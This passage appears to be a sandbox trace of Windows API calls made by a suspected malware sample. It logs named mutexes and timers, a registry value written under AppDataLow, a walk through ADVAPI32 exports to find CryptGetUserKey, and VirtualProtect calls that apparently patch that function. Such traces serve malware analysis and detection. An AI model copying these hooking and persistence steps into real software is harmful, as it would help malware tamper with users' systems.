fDeleteOnRelease=1, ppstm=0x74f76a8 | out: ppstm=0x74f76a8*=0xd1f0210) returned 0x0 [0209.110] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1318 [0209.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74c07f0, lpParameter=0x74f7880, dwCreationFlags=0x0, lpThreadId=0x74f7888 | out: lpThreadId=0x74f7888*=0xb50) returned 0x18e4 [0209.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74aeb80, lpParameter=0x74f7710, dwCreationFlags=0x0, lpThreadId=0x74f7718 | out: lpThreadId=0x74f7718*=0xb64) returned 0x10c8 [0209.111] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName="Local\\{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}") returned 0x0 [0209.111] CreateWaitableTimerA (lpTimerAttributes=0x74f77b0, bManualReset=1, lpTimerName="Local\\{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}") returned 0x10d0 [0209.111] GetLastError () returned 0x0 [0209.112] GetProcAddress (hModule=0x7ff977360000, lpProcName="PathFindFileNameA") returned 0x7ff97736cf30 [0209.112] PathFindFileNameA (pszPath="Local\\{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}") returned="{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}" [0209.112] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x235f5a0 | out: phkResult=0x235f5a0*=0x1314) returned 0x0 [0209.112] RegQueryValueExA (in: hKey=0x1314, lpValueName="{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}", lpReserved=0x0, lpType=0x235f540, lpData=0x0, lpcbData=0x235f5e8*=0x74f7718 | out: lpType=0x235f540*=0x0, lpData=0x0, lpcbData=0x235f5e8*=0x0) returned 0x2 [0209.112] RegCloseKey (hKey=0x1314) returned 0x0 [0209.112] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x235f578 | out: lpSystemTimeAsFileTime=0x235f578*(dwLowDateTime=0x6c55e030, dwHighDateTime=0x1d47567)) [0209.112] PathFindFileNameA (pszPath="Local\\{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}") returned="{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}" [0209.112] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x235f510 | out: phkResult=0x235f510*=0x1314) returned 0x0 [0209.112] RegSetValueExA (in: hKey=0x1314, lpValueName="{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}", Reserved=0x0, dwType=0x3, lpData=0x235f578*, cbData=0x8 | out: lpData=0x235f578*) returned 0x0 [0209.112] RegCloseKey (hKey=0x1314) returned 0x0 [0209.112] SetWaitableTimer (hTimer=0x10d0, lpDueTime=0x235f578, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0209.112] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName="Local\\{62D813F7-59FC-E439-F3B6-9D58D74A210C}") returned 0x0 [0209.112] CreateWaitableTimerA (lpTimerAttributes=0x74f77b0, bManualReset=1, lpTimerName="Local\\{62D813F7-59FC-E439-F3B6-9D58D74A210C}") returned 0x1314 [0209.113] GetLastError () returned 0x0 [0209.113] SetWaitableTimer (hTimer=0x1314, lpDueTime=0x235f5e8, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0209.113] OpenMutexA (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Local\\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned 0x0 [0209.113] CreateMutexA (lpMutexAttributes=0x74f77b0, bInitialOwner=0, lpName="Local\\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned 0x1344 [0209.113] CreateEventA (lpEventAttributes=0x74f77b0, bManualReset=1, bInitialState=0, lpName="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned 0x134c [0209.113] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName="Local\\{A8435A97-E752-1A33-B15C-0BEE75506F02}") returned 0x0 [0209.113] CreateWaitableTimerA (lpTimerAttributes=0x74f77b0, bManualReset=1, lpTimerName="Local\\{A8435A97-E752-1A33-B15C-0BEE75506F02}") returned 0x1340 [0209.113] GetLastError () returned 0x0 [0209.113] SetWaitableTimer (hTimer=0x1340, lpDueTime=0x235f5e8, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0209.113] OpenMutexA (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Local\\{FB999B87-1EC7-E503-005F-32E93403862D}") returned 0x0 [0209.113] CreateMutexA (lpMutexAttributes=0x74f77b0, bInitialOwner=0, lpName="Local\\{FB999B87-1EC7-E503-005F-32E93403862D}") returned 0x1338 [0209.113] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName="Local\\{E089BDC1-BF33-12AE-4914-63668D8847FA}") returned 0x0 [0209.113] CreateWaitableTimerA (lpTimerAttributes=0x74f77b0, bManualReset=1, lpTimerName="Local\\{E089BDC1-BF33-12AE-4914-63668D8847FA}") returned 0x1330 [0209.113] GetLastError () returned 0x0 [0209.113] SetWaitableTimer (hTimer=0x1330, lpDueTime=0x235f5e8, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0209.113] OpenMutexA (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Local\\{53667D0F-9637-FD89-3837-2A81EC5BFE45}") returned 0x0 [0209.113] CreateMutexA (lpMutexAttributes=0x74f77b0, bInitialOwner=0, lpName="Local\\{53667D0F-9637-FD89-3837-2A81EC5BFE45}") returned 0x132c [0209.113] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x7ff976f80000 [0209.114] GetModuleHandleA (lpModuleName="ADVAPI32.DLL") returned 0x7ff976f80000 [0209.114] lstrcmpA (lpString1="A_SHAFinal", lpString2="CryptGetUserKey") returned -1 [0209.114] lstrcmpA (lpString1="A_SHAInit", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="A_SHAUpdate", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheck", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckByType", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAce", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAuditAccessAce", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAuditAccessAceEx", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddAuditAccessObjectAce", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddConditionalAce", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddMandatoryAce", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddUsersToEncryptedFile", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AddUsersToEncryptedFileEx", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AdjustTokenGroups", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AdjustTokenPrivileges", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AllocateAndInitializeSid", lpString2="CryptGetUserKey") returned -1 [0209.115] lstrcmpA (lpString1="AllocateLocallyUniqueId", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AreAllAccessesGranted", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AreAnyAccessesGranted", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditComputeEffectivePolicyBySid", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditComputeEffectivePolicyByToken", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditEnumerateCategories", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditEnumeratePerUserPolicy", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditEnumerateSubCategories", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditFree", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditLookupCategoryGuidFromCategoryId", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditLookupCategoryIdFromCategoryGuid", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditLookupCategoryNameA", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditLookupCategoryNameW", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditLookupSubCategoryNameA", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditLookupSubCategoryNameW", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditQueryGlobalSaclA", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditQueryGlobalSaclW", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditQueryPerUserPolicy", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditQuerySecurity", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditQuerySystemPolicy", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditSetGlobalSaclA", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditSetGlobalSaclW", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditSetPerUserPolicy", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditSetSecurity", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="AuditSetSystemPolicy", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BackupEventLogA", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BackupEventLogW", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegCloseKey", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegCreateKey", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegDeleteKeyEx", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegDeleteValue", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegFlushKey", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegGetVersion", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegLoadKey", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegOpenKey", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegRestoreKey", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegSaveKeyEx", lpString2="CryptGetUserKey") returned -1 [0209.116] lstrcmpA (lpString1="BaseRegSetKeySecurity", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BaseRegSetValue", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BaseRegUnLoadKey", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildExplicitAccessWithNameA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildExplicitAccessWithNameW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildImpersonateExplicitAccessWithNameA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildImpersonateExplicitAccessWithNameW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildImpersonateTrusteeA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildImpersonateTrusteeW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildSecurityDescriptorA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildSecurityDescriptorW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildTrusteeWithNameA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildTrusteeWithNameW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndNameA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndNameW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndSidA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndSidW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildTrusteeWithSidA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="BuildTrusteeWithSidW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CancelOverlappedAccess", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="ChangeServiceConfig2A", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="ChangeServiceConfig2W", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="ChangeServiceConfigA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="ChangeServiceConfigW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CheckForHiberboot", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CheckTokenMembership", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="ClearEventLogA", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="ClearEventLogW", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CloseCodeAuthzLevel", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CloseEncryptedFileRaw", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CloseEventLog", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CloseServiceHandle", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CloseThreadWaitChainSession", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CloseTrace", lpString2="CryptGetUserKey") returned -1 [0209.117] lstrcmpA (lpString1="CommandLineFromMsiDescriptor", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ComputeAccessTokenFromCodeAuthzLevel", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ControlService", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ControlServiceExA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ControlServiceExW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ControlTraceA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ControlTraceW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertAccessToSecurityDescriptorA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertAccessToSecurityDescriptorW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSDToStringSDDomainW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSDToStringSDRootDomainA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSDToStringSDRootDomainW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessNamedA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessNamedW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSidToStringSidA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertSidToStringSidW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertStringSDToSDDomainA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertStringSDToSDDomainW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertStringSDToSDRootDomainA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertStringSDToSDRootDomainW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertStringSidToSidA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertStringSidToSidW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="ConvertToAutoInheritPrivateObjectSecurity", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="CopySid", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="CreateCodeAuthzLevel", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="CreatePrivateObjectSecurity", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="CreatePrivateObjectSecurityEx", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="CreatePrivateObjectSecurityWithMultipleInheritance", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="CreateProcessAsUserW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="CreateProcessWithLogonW", lpString2="CryptGetUserKey") returned -1 [0209.118] lstrcmpA (lpString1="CreateProcessWithTokenW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CreateRestrictedToken", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CreateServiceA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CreateServiceW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CreateTraceInstanceId", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CreateWellKnownSid", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredBackupCredentials", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredDeleteA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredDeleteW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredEncryptAndMarshalBinaryBlob", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredEnumerateA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredEnumerateW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredFindBestCredentialA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredFindBestCredentialW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredFree", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredGetSessionTypes", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredGetTargetInfoA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredGetTargetInfoW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredIsMarshaledCredentialA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredIsMarshaledCredentialW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredIsProtectedA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredIsProtectedW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredMarshalCredentialA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredMarshalCredentialW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredProfileLoaded", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredProfileLoadedEx", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredProfileUnloaded", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredProtectA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredProtectW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredReadA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredReadByTokenHandle", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredReadDomainCredentialsA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredReadDomainCredentialsW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredReadW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredRenameA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredRenameW", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredRestoreCredentials", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredUnmarshalCredentialA", lpString2="CryptGetUserKey") returned -1 [0209.119] lstrcmpA (lpString1="CredUnmarshalCredentialW", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredUnprotectA", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredUnprotectW", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredWriteA", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredWriteDomainCredentialsA", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredWriteDomainCredentialsW", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredWriteW", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredpConvertCredential", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredpConvertOneCredentialSize", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredpConvertTargetInfo", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredpDecodeCredential", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredpEncodeCredential", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CredpEncodeSecret", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptAcquireContextA", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptAcquireContextW", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptContextAddRef", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptCreateHash", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptDecrypt", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptDeriveKey", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptDestroyHash", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptDestroyKey", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptDuplicateHash", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptDuplicateKey", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptEncrypt", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptEnumProviderTypesA", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptEnumProviderTypesW", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptEnumProvidersA", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptEnumProvidersW", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptExportKey", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptGenKey", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptGenRandom", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptGetDefaultProviderA", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptGetDefaultProviderW", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptGetHashParam", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptGetKeyParam", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptGetProvParam", lpString2="CryptGetUserKey") returned -1 [0209.120] lstrcmpA (lpString1="CryptGetUserKey", lpString2="CryptGetUserKey") returned 0 [0209.120] VirtualProtect (in: lpAddress=0x7ff97700bbbc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x235f4f8 | out: lpflOldProtect=0x235f4f8*=0x2) returned 1 [0209.121] VirtualProtect (in: lpAddress=0x7ff976fe380e, dwSize=0xe, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x20) returned 1 [0209.122] VirtualProtect (in: lpAddress=0x7ff976fe380e, dwSize=0xe, flNewProtect=0x20, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0209.122] VirtualProtect (in: lpAddress=0x7ff97700bbbc, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x235f4f8 | out: lpflOldProtect=0x235f4f8*=0x40) returned 1 [0209.122] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f490, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f490, ReturnLength=0x0) returned 